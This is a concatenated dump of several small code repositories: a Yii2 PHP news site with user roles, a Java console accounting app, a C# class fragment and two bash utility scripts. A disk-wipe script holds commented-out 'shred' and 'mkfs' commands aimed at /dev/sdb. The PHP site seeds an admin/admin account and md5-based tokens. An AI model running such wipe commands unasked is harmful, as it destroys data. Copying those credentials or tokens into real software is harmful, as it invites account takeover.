public string FIO { get; set; }
public int age { get; set; }
public string phone { get; set; }
public Employee(string FIO, int age, string phone)
{
this.FIO = FIO;
this.age = age;
this.phone = phone;
}
}
}
|
470fab2ac871fdcc13161921c368abe4265b8af1
|
[
"C#"
] | 3 |
C#
|
AirN05/ASP.NET
|
bd97cb07ffe8564354ac2bb0e64f48ba06ac6b96
|
3485b45a8cc8a327c2a0cf0a6047a2299ebddd25
|
refs/heads/master
|
<repo_name>Savoy/News_test<file_sep>/README.md
# News test - простейший новостной сайт
Сайт выводит новости в порядке их добавления. Для просмотра самой новости необходима регистрация, а для добавления новостей необходимы права модератора.
Администратор может добавлять пользователей самостоятельно или редактировать/давать права уже существующим.
После применения миграций создается главный администратор с доступами: <b>admin/admin</b>
Через редактирование профиля необходимо указать корректный адрес почты администратору для получения уведомлений и рекомендуется сменить пароль.
Затраты по времени ориентировочно 6 часов.
<file_sep>/views/news/view.php
<?php
/* @var $this yii\web\View */
/* @var $model app\models\News */
use yii\helpers\Html;
use yii\widgets\DetailView;
use yii\bootstrap\Alert;
$this->title = $model->title;
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="news-view">
<h1><?= Html::encode($this->title) ?></h1>
<?php if (Yii::$app->session->hasFlash('successCreated')) echo Alert::widget([
'options' => ['class' => 'alert-success'],
'body' => 'Новость была успешно добавлена.'
]); ?>
<?php if (Yii::$app->session->hasFlash('successUpdated')) echo Alert::widget([
'options' => ['class' => 'alert-success'],
'body' => 'Изменения были успешно сохранены.'
]); ?>
<?php if (Yii::$app->user->identity->type >= \app\models\User::TYPE_MODERATOR): ?><p>
<?= Html::a('Редактировать', ['update', 'id' => $model->id], ['class' => 'btn btn-primary']) ?>
<?= Html::a('Удалить', ['delete', 'id' => $model->id], [
'class' => 'btn btn-danger',
'data' => [
'confirm' => 'Вы уверены, что хотите удалить этот элемент?',
'method' => 'post',
],
]) ?>
</p><?php endif; ?>
<?=DetailView::widget([
'model' => $model,
'attributes' => [
'id',
'date_creation',
'user.name',
'title',
'about',
'text:ntext'
]
]) ?>
</div>
<file_sep>/views/site/_news_item.php
<?php
/**
* Author: SAnV
* Date: 11.10.2017
* Time: 16:14
*
* @var $model app\models\News
*/
?>
<div class="row">
<hr>
<h2><?=$model->title ?> <small>добавлено пользователем <?=$model->user->name ?> (<?=date_create($model->date_creation)->format('d.m.Y H:i') ?>)</small></h2>
<p><?=$model->about ?></p>
<div><?=\yii\helpers\Html::a('Подробнее', ['/news/view', 'id'=>$model->id]) ?></div>
</div>
<file_sep>/views/site/index.php
<?php
/* @var $this yii\web\View */
/* @var $dataProvider yii\data\ActiveDataProvider */
use yii\helpers\Html;
use yii\helpers\Url;
use yii\widgets\ListView;
$this->title = Yii::$app->name;
?>
<div class="news-index">
<h1><?= Html::encode($this->title) ?></h1>
<?php if (Yii::$app->user->identity->type >= \app\models\User::TYPE_MODERATOR): ?>
<p><?= Html::a('Добавить новость', ['news/create'], ['class' => 'btn btn-success']) ?></p>
<?php endif; ?>
<div class="pull-right">Количество новостей на странице:
<?=Html::a(1, Url::current(['per-page' => 1])) ?>
<?=Html::a(5, Url::current(['per-page' => 5])) ?>
<?=Html::a(10, Url::current(['per-page' => 10])) ?>
<?=Html::a(50, Url::current(['per-page' => 50])) ?>
<?=Html::a(100, Url::current(['per-page' => 100])) ?>
</div>
<?=ListView::widget([
'dataProvider' => $dataProvider,
'itemView' => '_news_item',
'summary' => false
]); ?>
</div>
<file_sep>/models/User.php
<?php
namespace app\models;
use Yii;
use yii\db\Expression;
use yii\helpers\Html;
use yii\helpers\Url;
/**
* This is the model class for table "user".
*
* @property integer $id
* @property string $name
* @property string $email
* @property resource $password
* @property string $hash
* @property integer $type
* @property integer $status
* @property string $date_creation
* @property string $date_modification
*/
class User extends \yii\db\ActiveRecord implements \yii\web\IdentityInterface {
const TYPE_ADMIN = 3;
const TYPE_MODERATOR = 2;
const TYPE_USER = 1;
const STATUS_INACTIVE = null;
const STATUS_ACTIVE = 1;
const SUPER_ADMIN_ID = 1;
public $newPassword, $confirmPassword;
/**
* @inheritdoc
*/
public static function tableName() {
return 'user';
}
/**
* @inheritdoc
*/
public function rules() {
return [
[['name', 'email'], 'required'],
[['name'], 'string', 'max' => 32],
[['email'], 'email'],
[['email'], 'unique'],
[['email', 'hash'], 'string', 'max' => 64],
//[['type', 'status'], 'integer'],
[['newPassword', 'confirmPassword'], 'required', 'on'=>'register'],
[['newPassword', 'confirmPassword'], 'safe'],
[['confirmPassword'], 'compare', 'compareAttribute'=>'newPassword', 'skipOnError'=>true],
['date_creation', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return $model->isNewRecord; }],
['date_modification', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return !$model->isNewRecord; }],
];
}
/**
* @inheritdoc
*/
public function attributeLabels() {
return [
'id' => '#',
'name' => 'Имя',
'email' => 'E-mail',
'newPassword' => '<PASSWORD>',
'confirmPassword' => 'Подтверждение',
'hash' => 'Хеш-код',
'type' => 'Тип',
'status' => 'Статус',
'date_creation' => 'Дата добавления',
'date_modification' => 'Дата изменения'
];
}
/**
* @return \yii\db\ActiveQuery
*/
public function getNews() {
return $this->hasMany(News::className(), ['user_id' => 'id']);
}
public function getTypes() {
return [
self::TYPE_USER => 'Пользователь',
self::TYPE_MODERATOR => 'Модератор',
self::TYPE_ADMIN => 'Администратор'
];
}
public function getStatuses() {
return [
self::STATUS_INACTIVE => 'Не активен',
self::STATUS_ACTIVE => 'Активен'
];
}
/**
* Finds user by username
*
* @param string $username
* @return static|null
*/
public static function findByUsername($username) {
return static::findOne(['email'=>$username, 'status'=>self::STATUS_ACTIVE]);
}
/**
* @inheritdoc
*/
public static function findIdentity($id) {
return static::findOne(['id'=>$id, 'status'=>self::STATUS_ACTIVE]);
}
/**
* @inheritdoc
*/
public static function findIdentityByAccessToken($token, $type = null) {
return static::findOne(['hash'=>$token]);
}
/**
* @inheritdoc
*/
public function getId() {
return $this->id;
}
/**
* @inheritdoc
*/
public function getAuthKey() {
return $this->hash;
}
/**
* @inheritdoc
*/
public function validateAuthKey($authKey) {
return $this->hash === $authKey;
}
/**
* Validates password
*
* @param string $password <PASSWORD> to validate
* @return bool if password provided is valid for current user
*/
public function validatePassword($password) {
$bcrypt = new \app\components\Bcrypt();
return $bcrypt->verify($password, $this->password);
}
public function afterSave($insert, $changedAttributes) {
parent::afterSave($insert, $changedAttributes);
if ($insert) {
if ($this->newPassword) {
$bcrypt = new \app\components\Bcrypt();
$this->password = $bcrypt->hash($this->newPassword);
}
$this->hash = md5($this->email.$this->newPassword.time());
$this->save(false, ['password', 'hash']);
$activation_url = Url::to(['site/activate', 'key'=>$this->hash], 'http');
Yii::$app->mailer->compose()
->setFrom(['<EMAIL>'])
->setTo($this->email)
->setSubject('Welcome to '.Yii::$app->name)
->setTextBody('Your profile activation link: '.$activation_url)
->setHtmlBody('<b>Your profile activation link: </b> '.Html::a($activation_url, $activation_url))
->send();
Yii::$app->mailer->compose()
->setFrom(['<EMAIL>'])
->setTo(User::findOne(User::SUPER_ADMIN_ID)->email)
->setSubject('New user registration on '.Yii::$app->name)
->setTextBody('New user on the site: '.$this->email)
->setHtmlBody('<b>New user on the site: </b> '.$this->email)
->send();
}
}
}
<file_sep>/views/site/register.php
<?php
/* @var $this yii\web\View */
/* @var $model app\models\User */
/* @var $form ActiveForm */
use yii\helpers\Html;
use yii\bootstrap\ActiveForm;
use yii\bootstrap\Alert;
$this->title = 'Registration';
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="site-register">
<h1><?= Html::encode($this->title) ?></h1>
<?php if (Yii::$app->session->hasFlash('successRegistered')) echo Alert::widget([
'options' => ['class' => 'alert-success'],
'body' => 'Registration completed successfully.<br> An e-mail with a profile activation link has been sent to you.'
]); ?>
<?php $form = ActiveForm::begin([
'id' => 'register-form',
'layout' => 'horizontal',
'fieldConfig' => [
'template' => "{label}\n<div class=\"col-lg-4\">{input}</div>\n<div class=\"col-lg-6\">{error}</div>",
'labelOptions' => ['class' => 'col-lg-2 control-label'],
],
'enableAjaxValidation' => true
]); ?>
<?=$form->field($model, 'name') ?>
<?=$form->field($model, 'email') ?>
<?=$form->field($model, 'newPassword')->passwordInput() ?>
<?=$form->field($model, 'confirmPassword')->passwordInput() ?>
<div class="form-group">
<?= Html::submitButton('Submit', ['class' => 'btn btn-primary']) ?>
</div>
<?php ActiveForm::end(); ?>
</div><!-- site-register -->
<file_sep>/models/News.php
<?php
namespace app\models;
use Yii;
use yii\db\Expression;
/**
* This is the model class for table "news".
*
* @property string $id
* @property string $title
* @property string $about
* @property string $text
* @property string $user_id
* @property string $date_creation
* @property string $date_modification
*
* @property User $user
*/
class News extends \yii\db\ActiveRecord {
/**
* @inheritdoc
*/
public static function tableName() {
return 'news';
}
/**
* @inheritdoc
*/
public function rules() {
return [
[['title', 'about', 'text'], 'required'],
[['title'], 'string', 'max' => 255],
[['about', 'text'], 'string'],
[['user_id'], 'default', 'value'=>Yii::$app->user->id],
['date_creation', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return $model->isNewRecord; }],
['date_modification', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return !$model->isNewRecord; }],
[['user_id'], 'exist', 'skipOnError' => true, 'targetClass' => User::className(), 'targetAttribute' => ['user_id' => 'id']],
];
}
/**
* @inheritdoc
*/
public function attributeLabels() {
return [
'id' => '#',
'title' => 'Title',
'about' => 'Short description',
'text' => 'News text',
'user_id' => 'Author',
'date_creation' => 'Date added',
'date_modification' => 'Date modified'
];
}
/**
* @return \yii\db\ActiveQuery
*/
public function getUser() {
return $this->hasOne(User::className(), ['id' => 'user_id']);
}
}
<file_sep>/migrations/m171009_091833_create_user_table.php
<?php
use yii\db\Migration;
/**
* Handles the creation of table `user`.
*/
class m171009_091833_create_user_table extends Migration {
/**
* @inheritdoc
*/
public function up() {
$this->createTable('user', [
'id' => $this->primaryKey()->unsigned(),
'name' => $this->string(32)->notNull(),
'email' => $this->string(64)->notNull()->unique(),
'password' => $this->binary(60),
'hash' => $this->string(64),
'type' => $this->smallInteger(1),
'status' => $this->smallInteger(1),
'date_creation' => $this->timestamp(),
'date_modification' => $this->timestamp()
]);
$bcrypt = new \app\components\Bcrypt();
$this->insert('user', [
'name' => 'Admin',
'email' => 'admin',
'password' => $<PASSWORD>('<PASSWORD>'),
'hash' => md5(time()),
'type' => \app\models\User::TYPE_ADMIN,
'status' => \app\models\User::STATUS_ACTIVE,
'date_creation' => new \yii\db\Expression('NOW()')
]);
}
/**
* @inheritdoc
*/
public function down() {
$this->dropTable('user');
}
}
|
3fcde8974ea8a45330d689c7e13c68f9aab36d5f
|
[
"Markdown",
"PHP"
] | 8 |
Markdown
|
Savoy/News_test
|
0f893edcbf8e3b33e28db424ea218ae5087228a5
|
ba6f46e177e59fb5cba59543af1a0bbdce08f279
|
refs/heads/master
|
<repo_name>karmanova-ya/ReDi-AccountingProject<file_sep>/src/main/java/model/BankAccount.java
package model;
import java.io.Serializable;
public class BankAccount implements Serializable {
private static final long serialVersionUID = 1L;
private String bankName;
private double balance = 0;
public BankAccount(String bankName) {
this.bankName = bankName;
}
public String getBankName() {
return bankName;
}
public void setBankName(String bankName) {
this.bankName = bankName;
}
public double getBalance() {
return balance;
}
public void setBalance(double balance) {
this.balance = balance;
}
}
<file_sep>/src/main/java/model/Income.java
package model;
import utils.DateUtils;
public class Income extends Transaction{
private IncomeCategory inCategory;
@Override
public String toString() {
return "Income {" +
", amount=" + getAmount() +
", category=" + inCategory +
", month=" + DateUtils.month(getMonth()) +
", year=" + getYear() +
'}';
}
public IncomeCategory getInCategory() {
return inCategory;
}
public void setInCategory(IncomeCategory inCategory) {
this.inCategory = inCategory;
}
}
<file_sep>/src/main/java/services/StaticticService.java
package services;
import model.Income;
import model.Payment;
import model.PaymentCategory;
import repository.IncomeStorage;
import repository.PaymentStorage;
import utils.DateUtils;
import java.util.*;
public class StaticticService {
private final PaymentStorage paymentStorage;
private final IncomeStorage incomeStorage;
public StaticticService(PaymentStorage paymentStorage, IncomeStorage incomeStorage) {
this.paymentStorage = paymentStorage;
this.incomeStorage = incomeStorage;
}
//Give the user opportunity to choose what statistics they want to see:
public void selectStatistics() {
Scanner input = new Scanner(System.in);
System.out.println("Enter what statistics you want to see:");
System.out.println(
// totalSpendingByMonth totalSpending biggestPayment biggestIncome totalIncome paymentAlphGrouping totalSpendingByYear
"1 - My biggest payment\n" +
"2 - My biggest income\n" +
"3 - My total spending\n" +
"4 - My total income\n" +
"5 - Spendings sorted alphabetically\n" +
"6 - Statistics for 1 month\n" +
"7 - Statistics for 1 year\n" +
"0 - exit\n");
boolean isContinue = true;
while (isContinue) {
System.out.print("User's input> ");
int cat = input.nextInt();
switch (cat) {
case 1:
biggestPayment();
break;
case 2:
biggestIncome();
break;
case 3:
totalSpending();
break;
case 4:
totalIncome();
break;
case 5:
paymentAlphGrouping();
break;
case 6:
System.out.println("Enter a month:");
cat = input.nextInt();
totalSpendingByMonth(cat);
break;
case 7:
System.out.println("Enter a year:");
cat = input.nextInt();
totalSpendingByYear(cat);
break;
case 0:
System.out.println("See you next time :)\n");
isContinue = false;
break;
default:
System.out.println("Please clarify your answer\n");
}
}
}
//Show the user their the most expensive payment
public Payment biggestPayment() {
Payment big = null;
for (Payment payment : paymentStorage.getPayments()) {
if (big == null) {
big = payment;
} else if (payment.getAmount() < 0 && big.getAmount() > payment.getAmount()) {
big = payment;
}
}
System.out.println("The biggest payment is: " + big);
return big;
}
//Show the user their biggest income
public Income biggestIncome() {
Income big = null;
for (Income income : incomeStorage.getIncomes()) {
if (income.getAmount() > 0) {
if (big == null) {
big = income;
} else if (big.getAmount() < income.getAmount()) {
big = income;
}
}
}
System.out.println("The biggest income is: " + big);
return big;
}
//Show the user their total spending
public double totalSpending() {
double sum = 0;
for (Payment payment : paymentStorage.getPayments()) {
sum += payment.getAmount();
}
System.out.println("You spent in total: " + sum);
return sum;
}
//Show the user their total income
public double totalIncome() {
double sum = 0;
for (Income income : incomeStorage.getIncomes()) {
if (income.getAmount() > 0) {
sum += income.getAmount();
}
}
System.out.println("The total income is: " + sum);
return sum;
}
//Show the user their spending grouped by type, alphabetically ordered by the type name
public void paymentAlphGrouping() {
TreeMap<PaymentCategory, Double> alphabetSort = new TreeMap();
for (Payment payment : paymentStorage.getPayments()) {
PaymentCategory paymentCategory = payment.getPaymentCategory();
if (alphabetSort.containsKey(paymentCategory)) {
double sum = alphabetSort.get(paymentCategory) + payment.getAmount();
alphabetSort.put(paymentCategory, sum);
} else {
alphabetSort.put(paymentCategory, payment.getAmount());
}
}
System.out.println("How do you spend your money: ");
for (Map.Entry<PaymentCategory, Double> entry : alphabetSort.entrySet()) {
System.out.println(entry);
}
}
//Show spendings & earnings grouped by month during this year, chronologically ordered.
public void totalSpendingByMonth(int month) {
HashMap<Integer, Double> spendings = new HashMap();
HashMap<Integer, Double> earnings = new HashMap();
for (Payment payment : paymentStorage.getPayments()) {
month = payment.getMonth();
Date key = new GregorianCalendar(payment.getYear(), payment.getMonth() - 1, 0).getTime();
if (spendings.containsKey(month)) {
Double currentSum = spendings.get(month);
currentSum += payment.getAmount();
spendings.put(month, currentSum);
} else {
spendings.put(month, payment.getAmount());
}
}
for (Income income : incomeStorage.getIncomes()) {
month = income.getMonth();
Date key = new GregorianCalendar(income.getYear(), income.getMonth() - 1, 0).getTime();
if (earnings.containsKey(month)) {
Double currentSum = earnings.get(month) + income.getAmount();
earnings.put(month, currentSum);
} else {
earnings.put(month, income.getAmount());
}
}
for (int i = 1; i <= 12; i++) {
System.out.println("In " + DateUtils.month(i) + " you spent: " + spendings.getOrDefault(i, 0d) + "€" + " and earned: " + earnings.getOrDefault(i, 0d) + "€");
}
}
//Show spendings & earnings grouped by month during chosen year, chronologically ordered.
public void totalSpendingByYear(int year) {
HashMap<Integer, Double> spendings = new HashMap<>();
HashMap<Integer, Double> earnings = new HashMap<>();
for (Payment payment : paymentStorage.getPayments()) {
Integer month = payment.getMonth();
Date key = new GregorianCalendar(year, payment.getMonth() - 1, 0).getTime();
if (payment.getYear() == year) {
if (spendings.containsKey(month)) {
Double currentSum = spendings.get(month);
currentSum += payment.getAmount();
spendings.put(month, currentSum);
} else {
spendings.put(month, payment.getAmount());
}
}
}
for (Income income : incomeStorage.getIncomes()) {
Integer month = income.getMonth();
Date key = new GregorianCalendar(year, income.getMonth() - 1, 0).getTime();
if (income.getYear() == year) {
if (earnings.containsKey(month)) {
Double currentSum = earnings.get(month) + income.getAmount();
earnings.put(month, currentSum);
} else {
earnings.put(month, income.getAmount());
}
}
}
for (int i = 1; i <= 12; i++) {
Double spent = spendings.get(i);
Double earned = earnings.get(i);
if (spent != null || earned != null) {
System.out.println("In " + DateUtils.month(i) + " " + year + " you spent: " + spendings.getOrDefault(i, 0d) + "€" + " and earned: " + earnings.getOrDefault(i, 0d) + "€");
}
}
}
}
<file_sep>/src/main/java/model/PaymentCategory.java
package model;
public enum PaymentCategory {
ENTERTAINMENT, CAFE, TRANSPORT, GROCERY;
}<file_sep>/src/test/java/TransactionServiceTest.java
import model.BankAccount;
import model.PaymentCategory;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import repository.IncomeStorage;
import repository.PaymentStorage;
import services.TransactionService;
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import static org.junit.jupiter.api.Assertions.*;
public class TransactionServiceTest {
PaymentStorage ps;
IncomeStorage is;
TransactionService ts;
String bankName;
BankAccount deutscheBank;
@BeforeEach
void init() {
ps = new PaymentStorage();
is = new IncomeStorage();
ts = new TransactionService(ps, is);
// bankName = "Deutsche Bank";
deutscheBank = new BankAccount(bankName);
}
// @Test
// public void end2End() {
// assertTrue(deutscheBank.getBankName().equals("Deutsche Bank"));
// }
@Test
public void testDepositWithdraw() {
double depositAmount = 100;
ts.deposit(deutscheBank, depositAmount);
assertEquals(100, deutscheBank.getBalance());
double withdrawAmount = 30;
ts.withdraw(deutscheBank, withdrawAmount);
assertEquals(70, deutscheBank.getBalance());
}
@Test
public void testAddPayCategoryPositiv() {
String input = "e";
InputStream in = new ByteArrayInputStream(input.getBytes());
System.setIn(in);
assertTrue(ts.addPayCategory().equals(PaymentCategory.ENTERTAINMENT));
}
// @Test
// public void testAddPayCategoryNegativ() {
// String input = "y";
// InputStream in = new ByteArrayInputStream(input.getBytes());
// System.setIn(in);
// assertFalse(ts.addPayCategory().equals(PaymentCategory.ENTERTAINMENT));
// }
@Test
public void testAddInCategory() {
}
@Test
public void testAddPaymentDate() {
}
@Test
public void testAddPayment() {
}
@Test
public void testAddIncome() {
}
// BankAccount bankAccount;
// if (f.exists() && !f.isDirectory()) {
// bankAccount = readBankAcc();
// } else {
// bankAccount = createBankAcc();
// }
//
// System.out.println("Do you want add some money? (y/n)");
// String answer = input.next();
// double deposit = 0;
// if (answer.equals("y")) {
// try {
// System.out.println("Input here -->");
// deposit = input.nextDouble();
// transactionService.deposit(bankAccount, deposit);
// } catch (InputMismatchException e) {
// System.out.println("This does not really make sense, sorry. Please add an amount instead of text.");
// System.out.println("Input here -->");
// deposit = input.nextDouble();
// transactionService.deposit(bankAccount, deposit);
// }
// }
//
// System.out.println("Do you want to add payment(p) or income(i)?");
// String typeOfPayment = input.next();
// if (typeOfPayment.equals("p")) {
// transactionService.addPayment();
// } else if (typeOfPayment.equals("i")) {
// transactionService.addIncome();
// } else {
// System.out.println("Please clarify your answer\n");
// }
//
// System.out.println("Do you want to see transaction statistic? (y/n)");
// String userSelection = input.next();
// if (userSelection.equals("y")) {
// staticticService.selectStatistics();
// } else {
// System.out.println("Please clarify your answer\n");
// staticticService.selectStatistics();
// }
// }
}
<file_sep>/src/main/java/Main.java
import model.BankAccount;
import repository.IncomeStorage;
import repository.PaymentStorage;
import services.StaticticService;
import services.TransactionService;
import java.io.*;
import java.util.InputMismatchException;
import java.util.Scanner;
//add expenses and earnings through the console
//retrieve all previously inserted expenses and earnings
//receive summaries and balances
//#Bonus: ↗️
//If this is too simple, here some ideas how you can make the project more complex, potentially using more tools too:
//
//save and load data to and from file, to use it later on
//have a simple user management system that allows different users to register and log in the system, and store their data in different files
//use a real db!
public class Main {
//create file with Bank Account data
public static BankAccount createBankAcc() throws IOException {
Scanner in = new Scanner(System.in);
System.out.println("Let's create your bank account!");
System.out.print("Input bank name - ");
String bn = in.nextLine();
BankAccount bankAccount = new BankAccount(bn);
// try-with-resources flushes and closes the streams automatically
try (FileOutputStream fout = new FileOutputStream("bankAccount.ser");
ObjectOutputStream oos = new ObjectOutputStream(fout)) {
oos.writeObject(bankAccount);
}
return bankAccount;
}
//read file with Bank Account data
public static BankAccount readBankAcc() throws IOException, ClassNotFoundException {
// try-with-resources closes the streams even if deserialization fails
try (FileInputStream streamIn = new FileInputStream("bankAccount.ser");
ObjectInputStream objectinputstream = new ObjectInputStream(streamIn)) {
return (BankAccount) objectinputstream.readObject();
}
}
//create Menu method with selection
public static void menu() {
Scanner input = new Scanner(System.in);
System.out.println("");
}
public static void main(String[] args) throws IOException, ClassNotFoundException {
Scanner input = new Scanner(System.in);
PaymentStorage paymentStorage = new PaymentStorage();
IncomeStorage incomeStorage = new IncomeStorage();
TransactionService transactionService = new TransactionService(paymentStorage, incomeStorage);
StaticticService staticticService = new StaticticService(paymentStorage, incomeStorage);
//-----------------------------------------------
// checking to see if the account was created or not
File f = new File("bankAccount.ser");
BankAccount bankAccount;
if (f.exists() && !f.isDirectory()) {
bankAccount = readBankAcc();
} else {
bankAccount = createBankAcc();
}
System.out.println("Do you want add some money? (y/n)");
String answer = input.next();
double deposit = 0;
if (answer.equals("y")) {
try {
System.out.println("Input here -->");
deposit = input.nextDouble();
transactionService.deposit(bankAccount, deposit);
} catch (InputMismatchException e) {
System.out.println("This does not really make sense, sorry. Please add an amount instead of text.");
System.out.println("Input here -->");
deposit = input.nextDouble();
transactionService.deposit(bankAccount, deposit);
}
}
System.out.println("Do you want to add payment(p) or income(i)?");
String typeOfPayment = input.next();
if (typeOfPayment.equals("p")) {
transactionService.addPayment();
} else if (typeOfPayment.equals("i")) {
transactionService.addIncome();
} else {
System.out.println("Please clarify your answer\n");
}
System.out.println("Do you want to see transaction statistic? (y/n)");
String userSelection = input.next();
if (userSelection.equals("y")) {
staticticService.selectStatistics();
} else {
System.out.println("Please clarify your answer\n");
staticticService.selectStatistics();
}
}
}
<file_sep>/src/test/java/ExampleTest.java
import model.BankAccount;
import services.TransactionService;
import java.util.Scanner;
//
//public class DUmmy {
// @Test
// public void end2End() {
//
//
// String bankName = "Commrcebank";
//// String secondBName = input.nextLine();
// BankAccount deutscheBank = new BankAccount(bankName);
//// BankAccount n26 = new BankAccount(secondBName);
// assert deutscheBank.getBankName().equals("Commrercebank");
//
//
// double deposit = 100;
//
// TransactionService db = new TransactionService();
//
// db.deposit(deutscheBank, deposit);
//
//
// // wether bank has money
// asset deutscheBank.getBalance() == 0;
// }
//}
<file_sep>/src/main/java/repository/IncomeStorage.java
package repository;
import model.Income;
import java.util.HashSet;
public class IncomeStorage {
HashSet<Income> incomes = new HashSet<>();
public void addIncome(Income income){
incomes.add(income);
}
public HashSet<Income> getIncomes() {
return incomes;
}
}
<file_sep>/src/main/java/services/TransactionService.java
package services;
import model.*;
import repository.IncomeStorage;
import repository.PaymentStorage;
import utils.DateUtils;
import java.util.Scanner;
public class TransactionService {
private final PaymentStorage paymentStorage;
private final IncomeStorage incomeStorage;
public TransactionService(PaymentStorage paymentStorage, IncomeStorage incomeStorage) {
this.paymentStorage = paymentStorage;
this.incomeStorage = incomeStorage;
}
//deposit money into a bank account
public void deposit(BankAccount accTo, double money) { // Unit testing
accTo.setBalance(accTo.getBalance() + money); // add to the balance instead of overwriting it
System.out.println(money + "€ has been transferred to your " + accTo.getBankName() + " account");
}
//account withdraw
public void withdraw(BankAccount bAcc, double money) {
if (money <= bAcc.getBalance()) {
double newBalance = bAcc.getBalance() - money;
bAcc.setBalance(newBalance);
System.out.println("You withdrew " + money + "€ from your account");
System.out.println("Current account status: " + bAcc.getBalance() + "€");
} else {
System.out.print(" You don't have enough money on your balance :(");
System.out.println("Current account status: " + bAcc.getBalance() + "€");
}
}
public PaymentCategory addPayCategory() {
Scanner input = new Scanner(System.in);
System.out.println("Select your spending category: ");
System.out.println("ENTERTAINMENT (e), CAFE(c), TRANSPORT(t), GROCERY(g)");
String cat = input.next();
PaymentCategory payCat = null;
boolean isContinue = true;
while (isContinue) {
switch (cat) {
case "e":
payCat = PaymentCategory.ENTERTAINMENT;
isContinue = false;
break;
case "c":
payCat = PaymentCategory.CAFE;
isContinue = false;
break;
case "t":
payCat = PaymentCategory.TRANSPORT;
isContinue = false;
break;
case "g":
payCat = PaymentCategory.GROCERY;
isContinue = false;
break;
default:
System.out.println("Invalid category. Please check your input\n");
System.out.println("Select your spending category: ");
System.out.println("ENTERTAINMENT (e), CAFE(c), TRANSPORT(t), GROCERY(g)");
cat = input.next();
}
}
return payCat;
}
public IncomeCategory addInCategory() {
Scanner input = new Scanner(System.in);
System.out.println("Select your income category: ");
System.out.println("SALARY(s), DIVIDEND(d), KINDERGELD(k)");
String cat = input.next();
IncomeCategory inCat = null;
boolean isContinue = true;
while (isContinue) {
switch (cat) {
case "s":
inCat = IncomeCategory.SALARY;
isContinue = false;
break;
case "d":
inCat = IncomeCategory.DIVIDEND;
isContinue = false;
break;
case "k":
inCat = IncomeCategory.KINDERGELD;
isContinue = false;
break;
default:
System.out.println("Invalid category. Please check your input\n");
System.out.println("Select your income category: ");
System.out.println("SALARY(s), DIVIDEND(d), KINDERGELD(k)");
cat = input.next();
}
}
return inCat;
}
public String addPaymentDate(Transaction transaction) { // Unit testing
Scanner input = new Scanner(System.in);
System.out.print("Enter month -> ");
int month = input.nextInt();
boolean validMonth = false;
while (!validMonth) {
if (month > 0 && month <= 12) {
transaction.setMonth(month);
validMonth = true;
} else {
System.out.println("Invalid date. Please check your input\n");
System.out.print("Enter month -> ");
month = input.nextInt();
}
}
System.out.print("Enter year -> ");
int year = input.nextInt();
boolean validYear = false;
while (!validYear) {
if (year == 2019 || year == 2020) {
transaction.setYear(year);
validYear = true;
} else {
System.out.println("Invalid date. Please check your input\n");
System.out.print("Enter year -> ");
year = input.nextInt();
}
}
return DateUtils.month(month) + " " + year;
}
//add some payments in our bank
public void addPayment() { // Unit testing
Scanner input = new Scanner(System.in);
Payment payment = new Payment();
System.out.print("Enter amount -> ");
double amount = input.nextDouble();
payment.setPaymentCategory(addPayCategory());
payment.setAmount(-amount);
String date = addPaymentDate(payment);
// use the shared storage injected in the constructor; creating a fresh
// local PaymentStorage here would hide the payment from the statistics
paymentStorage.addPayment(payment);
System.out.println("You added a transaction: " + payment.getPaymentCategory() + " --> " + payment.getAmount() * (-1) + "€ --> " + date);
}
//add income transactions in our bank
public void addIncome() { // Unit testing
Scanner input = new Scanner(System.in);
Income income = new Income();
System.out.print("Enter amount -> ");
double amount = input.nextDouble();
income.setInCategory(addInCategory());
income.setAmount(amount);
String date = addPaymentDate(income);
// use the shared storage injected in the constructor; creating a fresh
// local IncomeStorage here would hide the income from the statistics
incomeStorage.addIncome(income);
System.out.println("You added a transaction: " + income.getInCategory() + " --> " + income.getAmount() + "€ --> " + date);
}
// void transfer(BankAccount accTo, double tranTo) {
// withdraw(BankAccount bAcc, tranTo);
//
//// accTo.deposit(tranTo);
// System.out.println("Transfer complete!");
// System.out.println(this.bankName + " - " + this.getBalance());
// System.out.println(accTo.bankName + " - " + accTo.getBalance());
// }
}
|
58235257ea45384dbf07996655c00570c4b071df
|
[
"Java"
] | 9 |
Java
|
karmanova-ya/ReDi-AccountingProject
|
adf5afcfbda56ab73a2e4a8927bd78f938fa05e6
|
0b6aad26a6d3710820e13cafefb1bf8d8d3612f8
|
refs/heads/master
|
<file_sep>#!/bin/bash
# Written by: <NAME>.
# Description: Wipes partitions on an HD or flash memory by overwriting
# them with random data. Also useful for restoring a pen drive after it
# has been used for a Linux installation.
echo " "
echo "Showing the partitions recognized by the system."
echo " "
fdisk -l
echo " "
echo "Select the desired partition"
echo " "
echo "Commented-out line: shred -n 5 -vz /dev/sdb <- takes approx. 20 min"
echo "Change the target partition before uncommenting"
#shred -n 5 -vz /dev/sdb
#mkfs.vfat -n "MemLabel" -I /dev/sdb1
echo " "
echo "Done"
<file_sep>#!/bin/bash
# Written by: <NAME>
# Description: Removes temporary LaTeX files generated during
# compilation.
#
# Some notes on redirecting to /dev/null:
#
# Discard the output:
# ls arquivo_nao_existente 1> /dev/null
# or, for short...
# ls arquivo_nao_existente > /dev/null
#
# Discard the error message:
# ls arquivo_nao_existente 2> /dev/null
#
# Discard both the output and the error message:
# rm arquivo_nao_existente > /dev/null 2> /dev/null
# or, for short...
# rm arquivo_nao_existente > /dev/null 2>&1
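#
# Added note (illustrative): the order of redirections matters.
# "cmd 2>&1 > /dev/null" still prints errors to the terminal, because
# stderr is duplicated to the *original* stdout before stdout is
# redirected; use "cmd > /dev/null 2>&1" to silence both.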
echo "> Removing temporary LaTeX files..."
rm *.aux 2> /dev/null
rm *.bbl 2> /dev/null
rm *.blg 2> /dev/null
rm *.brf 2> /dev/null
rm *.dvi 2> /dev/null
rm *.fdb_latexmk 2> /dev/null
rm *.fls 2> /dev/null
rm *.idx 2> /dev/null
rm *.ilg 2> /dev/null
rm *.ind 2> /dev/null
rm *.lof 2> /dev/null
rm *.log 2> /dev/null
rm *.lot 2> /dev/null
rm *.nav 2> /dev/null
rm *.out 2> /dev/null
rm *.run.xml 2> /dev/null
rm *.snm 2> /dev/null
